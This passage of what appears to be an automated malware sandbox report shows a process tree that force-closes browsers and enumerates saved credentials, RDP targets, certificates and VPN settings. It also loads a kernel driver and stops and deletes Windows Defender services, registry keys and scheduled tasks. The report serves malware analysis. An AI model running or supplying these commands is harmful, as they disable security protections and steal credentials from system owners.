                                                                                                "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=entity_extraction_service.mojom.Extractor --lang=en-US --service-sandbox-type=entity_extraction --no-sandbox --mute-audio --onnx-enabled-for-ee --string-annotations --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --always-read-main-dll --field-trial-handle=4696,i,9541402459245725751,11466482440319032895,262144 --disable-features=PaintHolding --variations-seed-version --mojo-platform-channel-handle=4692 /prefetch:8
                                                                                                8⤵
                                                                                                  PID:1964
                                                                                              • C:\Windows\system32\tasklist.exe
                                                                                                "tasklist" /FI "IMAGENAME eq msedge.exe"
                                                                                                7⤵
                                                                                                • Enumerates processes with tasklist
                                                                                                PID:7532
                                                                                              • C:\Windows\system32\taskkill.exe
                                                                                                "taskkill" /F /IM msedge.exe
                                                                                                7⤵
                                                                                                  PID:6936
                                                                                                • C:\Windows\system32\taskkill.exe
                                                                                                  "taskkill" /IM chrome.exe
                                                                                                  7⤵
                                                                                                  • Kills process with taskkill
                                                                                                  PID:8064
                                                                                                • C:\Windows\system32\taskkill.exe
                                                                                                  "taskkill" /IM msedge.exe
                                                                                                  7⤵
                                                                                                    PID:4284
                                                                                                  • C:\Windows\system32\taskkill.exe
                                                                                                    "taskkill" /IM brave.exe
                                                                                                    7⤵
                                                                                                    • Kills process with taskkill
                                                                                                    PID:2268
                                                                                                  • C:\Windows\system32\taskkill.exe
                                                                                                    "taskkill" /IM opera.exe
                                                                                                    7⤵
                                                                                                    • Kills process with taskkill
                                                                                                    PID:6288
                                                                                                  • C:\Windows\system32\taskkill.exe
                                                                                                    "taskkill" /IM vivaldi.exe
                                                                                                    7⤵
                                                                                                    • Kills process with taskkill
                                                                                                    PID:6248
                                                                                                  • C:\Windows\system32\taskkill.exe
                                                                                                    "taskkill" /IM firefox.exe
                                                                                                    7⤵
                                                                                                    • Kills process with taskkill
                                                                                                    PID:3532
                                                                                                  • C:\Windows\system32\taskkill.exe
                                                                                                    "taskkill" /IM dragon.exe
                                                                                                    7⤵
                                                                                                    • Kills process with taskkill
                                                                                                    PID:6476
                                                                                                  • C:\Windows\system32\taskkill.exe
                                                                                                    "taskkill" /IM maxthon.exe
                                                                                                    7⤵
                                                                                                    • Kills process with taskkill
                                                                                                    PID:3460
                                                                                                  • C:\Windows\system32\taskkill.exe
                                                                                                    "taskkill" /IM uc_browser.exe
                                                                                                    7⤵
                                                                                                    • Kills process with taskkill
                                                                                                    PID:6428
                                                                                                  • C:\Windows\system32\taskkill.exe
                                                                                                    "taskkill" /IM slimjet.exe
                                                                                                    7⤵
                                                                                                    • Kills process with taskkill
                                                                                                    PID:1152
                                                                                                  • C:\Windows\system32\taskkill.exe
                                                                                                    "taskkill" /IM cent_browser.exe
                                                                                                    7⤵
                                                                                                    • Kills process with taskkill
                                                                                                    PID:6040
                                                                                                  • C:\Windows\system32\taskkill.exe
                                                                                                    "taskkill" /IM epic.exe
                                                                                                    7⤵
                                                                                                    • Kills process with taskkill
                                                                                                    PID:4796
                                                                                                  • C:\Windows\system32\taskkill.exe
                                                                                                    "taskkill" /IM torch.exe
                                                                                                    7⤵
                                                                                                    • Kills process with taskkill
                                                                                                    PID:3440
                                                                                                  • C:\Windows\system32\taskkill.exe
                                                                                                    "taskkill" /IM whale.exe
                                                                                                    7⤵
                                                                                                    • Kills process with taskkill
                                                                                                    PID:7952
                                                                                                  • C:\Windows\system32\taskkill.exe
                                                                                                    "taskkill" /IM 360browser.exe
                                                                                                    7⤵
                                                                                                    • Kills process with taskkill
                                                                                                    PID:7596
                                                                                                  • C:\Windows\system32\taskkill.exe
                                                                                                    "taskkill" /IM qqbrowser.exe
                                                                                                    7⤵
                                                                                                      PID:8048
                                                                                                    • C:\Windows\system32\taskkill.exe
                                                                                                      "taskkill" /IM browser.exe
                                                                                                      7⤵
                                                                                                        PID:8044
                                                                                                      • C:\Windows\system32\taskkill.exe
                                                                                                        "taskkill" /F /IM chrome.exe
                                                                                                        7⤵
                                                                                                        • Kills process with taskkill
                                                                                                        PID:6796
                                                                                                      • C:\Windows\system32\taskkill.exe
                                                                                                        "taskkill" /F /IM msedge.exe
                                                                                                        7⤵
                                                                                                          PID:4444
                                                                                                        • C:\Windows\system32\taskkill.exe
                                                                                                          "taskkill" /F /IM brave.exe
                                                                                                          7⤵
                                                                                                          • Kills process with taskkill
                                                                                                          PID:6960
                                                                                                        • C:\Windows\system32\taskkill.exe
                                                                                                          "taskkill" /F /IM opera.exe
                                                                                                          7⤵
                                                                                                          • Kills process with taskkill
                                                                                                          PID:6872
                                                                                                        • C:\Windows\system32\taskkill.exe
                                                                                                          "taskkill" /F /IM vivaldi.exe
                                                                                                          7⤵
                                                                                                          • Kills process with taskkill
                                                                                                          PID:6916
                                                                                                        • C:\Windows\system32\taskkill.exe
                                                                                                          "taskkill" /F /IM firefox.exe
                                                                                                          7⤵
                                                                                                            PID:2700
                                                                                                          • C:\Windows\system32\taskkill.exe
                                                                                                            "taskkill" /F /IM dragon.exe
                                                                                                            7⤵
                                                                                                              PID:4620
                                                                                                            • C:\Windows\system32\taskkill.exe
                                                                                                              "taskkill" /F /IM maxthon.exe
                                                                                                              7⤵
                                                                                                              • Kills process with taskkill
                                                                                                              PID:6536
                                                                                                            • C:\Windows\system32\taskkill.exe
                                                                                                              "taskkill" /F /IM uc_browser.exe
                                                                                                              7⤵
                                                                                                              • Kills process with taskkill
                                                                                                              PID:3884
                                                                                                            • C:\Windows\system32\taskkill.exe
                                                                                                              "taskkill" /F /IM slimjet.exe
                                                                                                              7⤵
                                                                                                              • Kills process with taskkill
                                                                                                              PID:6884
                                                                                                            • C:\Windows\system32\taskkill.exe
                                                                                                              "taskkill" /F /IM cent_browser.exe
                                                                                                              7⤵
                                                                                                              • Kills process with taskkill
                                                                                                              PID:2508
                                                                                                            • C:\Windows\system32\taskkill.exe
                                                                                                              "taskkill" /F /IM epic.exe
                                                                                                              7⤵
                                                                                                              • Kills process with taskkill
                                                                                                              PID:6584
                                                                                                            • C:\Windows\system32\taskkill.exe
                                                                                                              "taskkill" /F /IM torch.exe
                                                                                                              7⤵
                                                                                                              • Kills process with taskkill
                                                                                                              PID:4352
                                                                                                            • C:\Windows\system32\taskkill.exe
                                                                                                              "taskkill" /F /IM whale.exe
                                                                                                              7⤵
                                                                                                              • Kills process with taskkill
                                                                                                              PID:6724
                                                                                                            • C:\Windows\system32\taskkill.exe
                                                                                                              "taskkill" /F /IM 360browser.exe
                                                                                                              7⤵
                                                                                                                PID:1672
                                                                                                              • C:\Windows\system32\taskkill.exe
                                                                                                                "taskkill" /F /IM qqbrowser.exe
                                                                                                                7⤵
                                                                                                                • Kills process with taskkill
                                                                                                                PID:628
                                                                                                              • C:\Windows\system32\taskkill.exe
                                                                                                                "taskkill" /F /IM browser.exe
                                                                                                                7⤵
                                                                                                                • Kills process with taskkill
                                                                                                                PID:2148
                                                                                                              • C:\Windows\system32\vaultcmd.exe
                                                                                                                "vaultcmd" /list
                                                                                                                7⤵
                                                                                                                  PID:4012
                                                                                                                • C:\Windows\system32\cmdkey.exe
                                                                                                                  "cmdkey" /list
                                                                                                                  7⤵
                                                                                                                    PID:6836
                                                                                                                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                    "powershell" -Command " $entries = cmdkey /list | Select-String \"TERMSRV\" -Context 0,3 foreach ($entry in $entries) { $target = ($entry -split \"target=\")[1].Trim() $ip = $target -replace \"TERMSRV/\", \"\" $userLine = $entry.Context.PostContext | Select-String \"User\" $user = if ($userLine) { ($userLine -split \":\")[1].Trim() } else { \"N/A\" } Write-Output \"Server: $ip | Username: $user\" } "
                                                                                                                    7⤵
                                                                                                                    • Command and Scripting Interpreter: PowerShell
                                                                                                                    PID:3512
                                                                                                                    • C:\Windows\system32\cmdkey.exe
                                                                                                                      "C:\Windows\system32\cmdkey.exe" /list
                                                                                                                      8⤵
                                                                                                                        PID:7544
                                                                                                                    • C:\Windows\system32\certutil.exe
                                                                                                                      "certutil" -store My
                                                                                                                      7⤵
                                                                                                                        PID:3700
                                                                                                                      • C:\Windows\system32\certutil.exe
                                                                                                                        "certutil" -store -user My
                                                                                                                        7⤵
                                                                                                                          PID:4080
                                                                                                                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                          "powershell" -Command "Get-VpnConnection | ConvertTo-Json"
                                                                                                                          7⤵
                                                                                                                          • Command and Scripting Interpreter: PowerShell
                                                                                                                          PID:6164
                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\10412830101\apple.exe
                                                                                                                        "C:\Users\Admin\AppData\Local\Temp\10412830101\apple.exe"
                                                                                                                        6⤵
                                                                                                                        • Checks computer location settings
                                                                                                                        • Executes dropped EXE
                                                                                                                        • System Location Discovery: System Language Discovery
                                                                                                                        PID:3152
                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\261.exe
                                                                                                                          "C:\Users\Admin\AppData\Local\Temp\261.exe"
                                                                                                                          7⤵
                                                                                                                          • Checks computer location settings
                                                                                                                          • Executes dropped EXE
                                                                                                                          • System Location Discovery: System Language Discovery
                                                                                                                          PID:2576
                                                                                                                          • C:\Windows\system32\cmd.exe
                                                                                                                            "C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\B2F0.tmp\B2F1.tmp\B2F2.bat C:\Users\Admin\AppData\Local\Temp\261.exe"
                                                                                                                            8⤵
                                                                                                                              PID:2420
                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\261.exe
                                                                                                                                "C:\Users\Admin\AppData\Local\Temp\261.exe" go
                                                                                                                                9⤵
                                                                                                                                • Checks computer location settings
                                                                                                                                • Executes dropped EXE
                                                                                                                                • System Location Discovery: System Language Discovery
                                                                                                                                PID:4820
                                                                                                                                • C:\Windows\system32\cmd.exe
                                                                                                                                  "C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\B3AC.tmp\B3AC.tmp\B3AD.bat C:\Users\Admin\AppData\Local\Temp\261.exe go"
                                                                                                                                  10⤵
                                                                                                                                  • Drops file in Program Files directory
                                                                                                                                  PID:4024
                                                                                                                                  • C:\Windows\system32\sc.exe
                                                                                                                                    sc create ddrver type= kernel binPath= "C:\Users\Admin\AppData\Local\Temp\ssisd.sys"
                                                                                                                                    11⤵
                                                                                                                                    • Launches sc.exe
                                                                                                                                    PID:6112
                                                                                                                                  • C:\Windows\system32\sc.exe
                                                                                                                                    sc start ddrver
                                                                                                                                    11⤵
                                                                                                                                    • Launches sc.exe
                                                                                                                                    PID:1340
                                                                                                                                  • C:\Windows\system32\timeout.exe
                                                                                                                                    timeout /t 1
                                                                                                                                    11⤵
                                                                                                                                    • Delays execution with timeout.exe
                                                                                                                                    PID:3748
                                                                                                                                  • C:\Windows\system32\sc.exe
                                                                                                                                    sc stop ddrver
                                                                                                                                    11⤵
                                                                                                                                    • Launches sc.exe
                                                                                                                                    PID:4804
                                                                                                                                  • C:\Windows\system32\sc.exe
                                                                                                                                    sc start ddrver
                                                                                                                                    11⤵
                                                                                                                                    • Launches sc.exe
                                                                                                                                    PID:4312
                                                                                                                                  • C:\Windows\system32\takeown.exe
                                                                                                                                    takeown /f "C:\ProgramData\Microsoft\Windows Defender" /r /d y
                                                                                                                                    11⤵
                                                                                                                                    • Possible privilege escalation attempt
                                                                                                                                    • Modifies file permissions
                                                                                                                                    PID:4352
                                                                                                                                  • C:\Windows\system32\icacls.exe
                                                                                                                                    icacls "C:\ProgramData\Microsoft\Windows Defender" /grant administrators:F /t
                                                                                                                                    11⤵
                                                                                                                                    • Possible privilege escalation attempt
                                                                                                                                    • Modifies file permissions
                                                                                                                                    PID:4940
                                                                                                                                  • C:\Windows\system32\sc.exe
                                                                                                                                    sc stop "WinDefend"
                                                                                                                                    11⤵
                                                                                                                                    • Launches sc.exe
                                                                                                                                    PID:5972
                                                                                                                                  • C:\Windows\system32\sc.exe
                                                                                                                                    sc delete "WinDefend"
                                                                                                                                    11⤵
                                                                                                                                    • Launches sc.exe
                                                                                                                                    PID:3668
                                                                                                                                  • C:\Windows\system32\reg.exe
                                                                                                                                    reg delete "HKLM\System\CurrentControlset\Services\WinDefend" /f
                                                                                                                                    11⤵
                                                                                                                                      PID:4792
                                                                                                                                    • C:\Windows\system32\sc.exe
                                                                                                                                      sc stop "MDCoreSvc"
                                                                                                                                      11⤵
                                                                                                                                      • Launches sc.exe
                                                                                                                                      PID:2984
                                                                                                                                    • C:\Windows\system32\sc.exe
                                                                                                                                      sc delete "MDCoreSvc"
                                                                                                                                      11⤵
                                                                                                                                      • Launches sc.exe
                                                                                                                                      PID:3400
                                                                                                                                    • C:\Windows\system32\reg.exe
                                                                                                                                      reg delete "HKLM\System\CurrentControlset\Services\MDCoreSvc" /f
                                                                                                                                      11⤵
                                                                                                                                        PID:5988
                                                                                                                                      • C:\Windows\system32\sc.exe
                                                                                                                                        sc stop "WdNisSvc"
                                                                                                                                        11⤵
                                                                                                                                        • Launches sc.exe
                                                                                                                                        PID:2760
                                                                                                                                      • C:\Windows\system32\sc.exe
                                                                                                                                        sc delete "WdNisSvc"
                                                                                                                                        11⤵
                                                                                                                                        • Launches sc.exe
                                                                                                                                        PID:5032
                                                                                                                                      • C:\Windows\system32\reg.exe
                                                                                                                                        reg delete "HKLM\System\CurrentControlset\Services\WdNisSvc" /f
                                                                                                                                        11⤵
                                                                                                                                          PID:5816
                                                                                                                                        • C:\Windows\system32\sc.exe
                                                                                                                                          sc stop "Sense"
                                                                                                                                          11⤵
                                                                                                                                          • Launches sc.exe
                                                                                                                                          PID:6084
                                                                                                                                        • C:\Windows\system32\sc.exe
                                                                                                                                          sc delete "Sense"
                                                                                                                                          11⤵
                                                                                                                                          • Launches sc.exe
                                                                                                                                          PID:5808
                                                                                                                                        • C:\Windows\system32\reg.exe
                                                                                                                                          reg delete "HKLM\System\CurrentControlset\Services\Sense" /f
                                                                                                                                          11⤵
                                                                                                                                            PID:4632
                                                                                                                                          • C:\Windows\system32\sc.exe
                                                                                                                                            sc stop "wscsvc"
                                                                                                                                            11⤵
                                                                                                                                            • Launches sc.exe
                                                                                                                                            PID:3380
                                                                                                                                          • C:\Windows\system32\sc.exe
                                                                                                                                            sc delete "wscsvc"
                                                                                                                                            11⤵
                                                                                                                                            • Launches sc.exe
                                                                                                                                            PID:3128
                                                                                                                                          • C:\Windows\system32\reg.exe
                                                                                                                                            reg delete "HKLM\System\CurrentControlset\Services\wscsvc" /f
                                                                                                                                            11⤵
                                                                                                                                            • Modifies security service
                                                                                                                                            PID:3516
                                                                                                                                          • C:\Windows\system32\sc.exe
                                                                                                                                            sc stop "SgrmBroker"
                                                                                                                                            11⤵
                                                                                                                                            • Launches sc.exe
                                                                                                                                            PID:6116
                                                                                                                                          • C:\Windows\system32\sc.exe
                                                                                                                                            sc delete "SgrmBroker"
                                                                                                                                            11⤵
                                                                                                                                            • Launches sc.exe
                                                                                                                                            PID:5268
                                                                                                                                          • C:\Windows\system32\reg.exe
                                                                                                                                            reg delete "HKLM\System\CurrentControlset\Services\SgrmBroker" /f
                                                                                                                                            11⤵
                                                                                                                                              PID:4520
                                                                                                                                            • C:\Windows\system32\sc.exe
                                                                                                                                              sc stop "SecurityHealthService"
                                                                                                                                              11⤵
                                                                                                                                              • Launches sc.exe
                                                                                                                                              PID:5932
                                                                                                                                            • C:\Windows\system32\sc.exe
                                                                                                                                              sc delete "SecurityHealthService"
                                                                                                                                              11⤵
                                                                                                                                              • Launches sc.exe
                                                                                                                                              PID:2508
                                                                                                                                            • C:\Windows\system32\reg.exe
                                                                                                                                              reg delete "HKLM\System\CurrentControlset\Services\SecurityHealthService" /f
                                                                                                                                              11⤵
                                                                                                                                                PID:4152
                                                                                                                                              • C:\Windows\system32\sc.exe
                                                                                                                                                sc stop "webthreatdefsvc"
                                                                                                                                                11⤵
                                                                                                                                                • Launches sc.exe
                                                                                                                                                PID:3100
                                                                                                                                              • C:\Windows\system32\sc.exe
                                                                                                                                                sc delete "webthreatdefsvc"
                                                                                                                                                11⤵
                                                                                                                                                • Launches sc.exe
                                                                                                                                                PID:4848
                                                                                                                                              • C:\Windows\system32\reg.exe
                                                                                                                                                reg delete "HKLM\System\CurrentControlset\Services\webthreatdefsvc" /f
                                                                                                                                                11⤵
                                                                                                                                                  PID:5220
                                                                                                                                                • C:\Windows\system32\sc.exe
                                                                                                                                                  sc stop "webthreatdefusersvc"
                                                                                                                                                  11⤵
                                                                                                                                                    PID:3076
                                                                                                                                                  • C:\Windows\system32\sc.exe
                                                                                                                                                    sc delete "webthreatdefusersvc"
                                                                                                                                                    11⤵
                                                                                                                                                      PID:5324
                                                                                                                                                    • C:\Windows\system32\reg.exe
                                                                                                                                                      reg delete "HKLM\System\CurrentControlset\Services\webthreatdefusersvc" /f
                                                                                                                                                      11⤵
                                                                                                                                                        PID:5652
                                                                                                                                                      • C:\Windows\system32\sc.exe
                                                                                                                                                        sc stop "WdNisDrv"
                                                                                                                                                        11⤵
                                                                                                                                                        • Launches sc.exe
                                                                                                                                                        PID:5716
                                                                                                                                                      • C:\Windows\system32\sc.exe
                                                                                                                                                        sc delete "WdNisDrv"
                                                                                                                                                        11⤵
                                                                                                                                                        • Launches sc.exe
                                                                                                                                                        PID:6136
                                                                                                                                                      • C:\Windows\system32\reg.exe
                                                                                                                                                        reg delete "HKLM\System\CurrentControlset\Services\WdNisDrv" /f
                                                                                                                                                        11⤵
                                                                                                                                                          PID:5076
                                                                                                                                                        • C:\Windows\system32\sc.exe
                                                                                                                                                          sc stop "WdBoot"
                                                                                                                                                          11⤵
                                                                                                                                                          • Launches sc.exe
                                                                                                                                                          PID:4192
                                                                                                                                                        • C:\Windows\system32\sc.exe
                                                                                                                                                          sc delete "WdBoot"
                                                                                                                                                          11⤵
                                                                                                                                                          • Launches sc.exe
                                                                                                                                                          PID:888
                                                                                                                                                        • C:\Windows\system32\reg.exe
                                                                                                                                                          reg delete "HKLM\System\CurrentControlset\Services\WdBoot" /f
                                                                                                                                                          11⤵
                                                                                                                                                            PID:1152
                                                                                                                                                          • C:\Windows\system32\sc.exe
                                                                                                                                                            sc stop "WdFilter"
                                                                                                                                                            11⤵
                                                                                                                                                            • Launches sc.exe
                                                                                                                                                            PID:5732
                                                                                                                                                          • C:\Windows\system32\sc.exe
                                                                                                                                                            sc delete "WdFilter"
                                                                                                                                                            11⤵
                                                                                                                                                              PID:3988
                                                                                                                                                            • C:\Windows\system32\reg.exe
                                                                                                                                                              reg delete "HKLM\System\CurrentControlset\Services\WdFilter" /f
                                                                                                                                                              11⤵
                                                                                                                                                                PID:1652
                                                                                                                                                              • C:\Windows\system32\sc.exe
                                                                                                                                                                sc stop "SgrmAgent"
                                                                                                                                                                11⤵
                                                                                                                                                                • Launches sc.exe
                                                                                                                                                                PID:1236
                                                                                                                                                              • C:\Windows\system32\sc.exe
                                                                                                                                                                sc delete "SgrmAgent"
                                                                                                                                                                11⤵
                                                                                                                                                                • Launches sc.exe
                                                                                                                                                                PID:1384
                                                                                                                                                              • C:\Windows\system32\reg.exe
                                                                                                                                                                reg delete "HKLM\System\CurrentControlset\Services\SgrmAgent" /f
                                                                                                                                                                11⤵
                                                                                                                                                                  PID:4940
                                                                                                                                                                • C:\Windows\system32\sc.exe
                                                                                                                                                                  sc stop "MsSecWfp"
                                                                                                                                                                  11⤵
                                                                                                                                                                    PID:5552
                                                                                                                                                                  • C:\Windows\system32\sc.exe
                                                                                                                                                                    sc delete "MsSecWfp"
                                                                                                                                                                    11⤵
                                                                                                                                                                    • Launches sc.exe
                                                                                                                                                                    PID:1448
                                                                                                                                                                  • C:\Windows\system32\reg.exe
                                                                                                                                                                    reg delete "HKLM\System\CurrentControlset\Services\MsSecWfp" /f
                                                                                                                                                                    11⤵
                                                                                                                                                                      PID:2296
                                                                                                                                                                    • C:\Windows\system32\sc.exe
                                                                                                                                                                      sc stop "MsSecFlt"
                                                                                                                                                                      11⤵
                                                                                                                                                                      • Launches sc.exe
                                                                                                                                                                      PID:5256
                                                                                                                                                                    • C:\Windows\system32\sc.exe
                                                                                                                                                                      sc delete "MsSecFlt"
                                                                                                                                                                      11⤵
                                                                                                                                                                      • Launches sc.exe
                                                                                                                                                                      PID:4656
                                                                                                                                                                    • C:\Windows\system32\reg.exe
                                                                                                                                                                      reg delete "HKLM\System\CurrentControlset\Services\MsSecFlt" /f
                                                                                                                                                                      11⤵
                                                                                                                                                                        PID:4612
                                                                                                                                                                      • C:\Windows\system32\sc.exe
                                                                                                                                                                        sc stop "MsSecCore"
                                                                                                                                                                        11⤵
                                                                                                                                                                          PID:5288
                                                                                                                                                                        • C:\Windows\system32\sc.exe
                                                                                                                                                                          sc delete "MsSecCore"
                                                                                                                                                                          11⤵
                                                                                                                                                                          • Launches sc.exe
                                                                                                                                                                          PID:4580
                                                                                                                                                                        • C:\Windows\system32\reg.exe
                                                                                                                                                                          reg delete "HKLM\System\CurrentControlset\Services\MsSecCore" /f
                                                                                                                                                                          11⤵
                                                                                                                                                                            PID:1128
                                                                                                                                                                          • C:\Windows\system32\schtasks.exe
                                                                                                                                                                            schtasks /Delete /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /f
                                                                                                                                                                            11⤵
                                                                                                                                                                              PID:1804
                                                                                                                                                                            • C:\Windows\system32\schtasks.exe
                                                                                                                                                                              schtasks /Delete /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /f
                                                                                                                                                                              11⤵
                                                                                                                                                                                PID:5356
                                                                                                                                                                              • C:\Windows\system32\schtasks.exe
                                                                                                                                                                                schtasks /Delete /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /f
                                                                                                                                                                                11⤵
                                                                                                                                                                                  PID:992
                                                                                                                                                                                • C:\Windows\system32\schtasks.exe
                                                                                                                                                                                  schtasks /Delete /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /f
                                                                                                                                                                                  11⤵
                                                                                                                                                                                    PID:2184
                                                                                                                                                                                  • C:\Windows\system32\sc.exe
                                                                                                                                                                                    sc stop ddrver
                                                                                                                                                                                    11⤵
                                                                                                                                                                                    • Launches sc.exe
                                                                                                                                                                                    PID:4696
                                                                                                                                                                                  • C:\Windows\system32\sc.exe
                                                                                                                                                                                    sc delete ddrver
                                                                                                                                                                                    11⤵
                                                                                                                                                                                    • Launches sc.exe
                                                                                                                                                                                    PID:1736
                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\261.exe
                                                                                                                                                                            "C:\Users\Admin\AppData\Local\Temp\261.exe"
                                                                                                                                                                            7⤵
                                                                                                                                                                            • Checks computer location settings
                                                                                                                                                                            • Executes dropped EXE
                                                                                                                                                                            • System Location Discovery: System Language Discovery
                                                                                                                                                                            PID:5760
                                                                                                                                                                            • C:\Windows\system32\cmd.exe
                                                                                                                                                                              "C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\B2FF.tmp\B300.tmp\B301.bat C:\Users\Admin\AppData\Local\Temp\261.exe"
                                                                                                                                                                              8⤵
                                                                                                                                                                                PID:4428
                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\261.exe
                                                                                                                                                                                  "C:\Users\Admin\AppData\Local\Temp\261.exe" go
                                                                                                                                                                                  9⤵
                                                                                                                                                                                  • Checks computer location settings
                                                                                                                                                                                  • Executes dropped EXE
                                                                                                                                                                                  • System Location Discovery: System Language Discovery
                                                                                                                                                                                  PID:5676
                                                                                                                                                                                  • C:\Windows\system32\cmd.exe
                                                                                                                                                                                    "C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\B3AB.tmp\B3AC.tmp\B3AD.bat C:\Users\Admin\AppData\Local\Temp\261.exe go"
                                                                                                                                                                                    10⤵
                                                                                                                                                                                    • Drops file in Program Files directory
                                                                                                                                                                                    PID:2700
                                                                                                                                                                                    • C:\Windows\system32\sc.exe
                                                                                                                                                                                      sc create ddrver type= kernel binPath= "C:\Users\Admin\AppData\Local\Temp\ssisd.sys"
                                                                                                                                                                                      11⤵
                                                                                                                                                                                      • Launches sc.exe
                                                                                                                                                                                      PID:4064
                                                                                                                                                                                    • C:\Windows\system32\sc.exe
                                                                                                                                                                                      sc start ddrver
                                                                                                                                                                                      11⤵
                                                                                                                                                                                      • Launches sc.exe
                                                                                                                                                                                      PID:3232
                                                                                                                                                                                    • C:\Windows\system32\timeout.exe
                                                                                                                                                                                      timeout /t 1
                                                                                                                                                                                      11⤵
                                                                                                                                                                                      • Delays execution with timeout.exe
                                                                                                                                                                                      PID:1456
                                                                                                                                                                                    • C:\Windows\system32\sc.exe
                                                                                                                                                                                      sc stop ddrver
                                                                                                                                                                                      11⤵
                                                                                                                                                                                      • Launches sc.exe
                                                                                                                                                                                      PID:5960
                                                                                                                                                                                    • C:\Windows\system32\sc.exe
                                                                                                                                                                                      sc start ddrver
                                                                                                                                                                                      11⤵
                                                                                                                                                                                        PID:952
                                                                                                                                                                                      • C:\Windows\system32\takeown.exe
                                                                                                                                                                                        takeown /f "C:\ProgramData\Microsoft\Windows Defender" /r /d y
                                                                                                                                                                                        11⤵
                                                                                                                                                                                        • Possible privilege escalation attempt
                                                                                                                                                                                        • Modifies file permissions
                                                                                                                                                                                        PID:3844
                                                                                                                                                                                      • C:\Windows\system32\icacls.exe
                                                                                                                                                                                        icacls "C:\ProgramData\Microsoft\Windows Defender" /grant administrators:F /t
                                                                                                                                                                                        11⤵
                                                                                                                                                                                        • Possible privilege escalation attempt
                                                                                                                                                                                        • Modifies file permissions
                                                                                                                                                                                        PID:1448
                                                                                                                                                                                      • C:\Windows\system32\sc.exe
                                                                                                                                                                                        sc stop "WinDefend"
                                                                                                                                                                                        11⤵
                                                                                                                                                                                        • Launches sc.exe
                                                                                                                                                                                        PID:5552
                                                                                                                                                                                      • C:\Windows\system32\sc.exe
                                                                                                                                                                                        sc delete "WinDefend"
                                                                                                                                                                                        11⤵
                                                                                                                                                                                        • Launches sc.exe
                                                                                                                                                                                        PID:5804
                                                                                                                                                                                      • C:\Windows\system32\reg.exe
                                                                                                                                                                                        reg delete "HKLM\System\CurrentControlset\Services\WinDefend" /f
                                                                                                                                                                                        11⤵
                                                                                                                                                                                          PID:5256
                                                                                                                                                                                        • C:\Windows\system32\sc.exe
                                                                                                                                                                                          sc stop "MDCoreSvc"
                                                                                                                                                                                          11⤵
                                                                                                                                                                                          • Launches sc.exe
                                                                                                                                                                                          PID:5280
                                                                                                                                                                                        • C:\Windows\system32\sc.exe
                                                                                                                                                                                          sc delete "MDCoreSvc"
                                                                                                                                                                                          11⤵
                                                                                                                                                                                          • Launches sc.exe
                                                                                                                                                                                          PID:4840
                                                                                                                                                                                        • C:\Windows\system32\reg.exe
                                                                                                                                                                                          reg delete "HKLM\System\CurrentControlset\Services\MDCoreSvc" /f
                                                                                                                                                                                          11⤵
                                                                                                                                                                                            PID:4704
                                                                                                                                                                                          • C:\Windows\system32\sc.exe
                                                                                                                                                                                            sc stop "WdNisSvc"
                                                                                                                                                                                            11⤵
                                                                                                                                                                                              PID:4580
                                                                                                                                                                                            • C:\Windows\system32\sc.exe
                                                                                                                                                                                              sc delete "WdNisSvc"
                                                                                                                                                                                              11⤵
                                                                                                                                                                                              • Launches sc.exe
                                                                                                                                                                                              PID:5936
                                                                                                                                                                                            • C:\Windows\system32\reg.exe
                                                                                                                                                                                              reg delete "HKLM\System\CurrentControlset\Services\WdNisSvc" /f
                                                                                                                                                                                              11⤵
                                                                                                                                                                                                PID:3220
                                                                                                                                                                                              • C:\Windows\system32\sc.exe
                                                                                                                                                                                                sc stop "Sense"
                                                                                                                                                                                                11⤵
                                                                                                                                                                                                • Launches sc.exe
                                                                                                                                                                                                PID:5876
                                                                                                                                                                                              • C:\Windows\system32\sc.exe
                                                                                                                                                                                                sc delete "Sense"
                                                                                                                                                                                                11⤵
                                                                                                                                                                                                • Launches sc.exe
                                                                                                                                                                                                PID:3484
                                                                                                                                                                                              • C:\Windows\system32\reg.exe
                                                                                                                                                                                                reg delete "HKLM\System\CurrentControlset\Services\Sense" /f
                                                                                                                                                                                                11⤵
                                                                                                                                                                                                  PID:4696
                                                                                                                                                                                                • C:\Windows\system32\sc.exe
                                                                                                                                                                                                  sc stop "wscsvc"
                                                                                                                                                                                                  11⤵
                                                                                                                                                                                                  • Launches sc.exe
                                                                                                                                                                                                  PID:4100
                                                                                                                                                                                                • C:\Windows\system32\sc.exe
                                                                                                                                                                                                  sc delete "wscsvc"
                                                                                                                                                                                                  11⤵
                                                                                                                                                                                                  • Launches sc.exe
                                                                                                                                                                                                  PID:5272
                                                                                                                                                                                                • C:\Windows\system32\reg.exe
                                                                                                                                                                                                  reg delete "HKLM\System\CurrentControlset\Services\wscsvc" /f
                                                                                                                                                                                                  11⤵
                                                                                                                                                                                                    PID:5484
                                                                                                                                                                                                  • C:\Windows\system32\sc.exe
                                                                                                                                                                                                    sc stop "SgrmBroker"
                                                                                                                                                                                                    11⤵
                                                                                                                                                                                                      PID:5704
                                                                                                                                                                                                    • C:\Windows\system32\sc.exe
                                                                                                                                                                                                      sc delete "SgrmBroker"
                                                                                                                                                                                                      11⤵
                                                                                                                                                                                                      • Launches sc.exe
                                                                                                                                                                                                      PID:2792
                                                                                                                                                                                                    • C:\Windows\system32\reg.exe
                                                                                                                                                                                                      reg delete "HKLM\System\CurrentControlset\Services\SgrmBroker" /f
                                                                                                                                                                                                      11⤵
                                                                                                                                                                                                        PID:3424
                                                                                                                                                                                                      • C:\Windows\system32\sc.exe
                                                                                                                                                                                                        sc stop "SecurityHealthService"
                                                                                                                                                                                                        11⤵
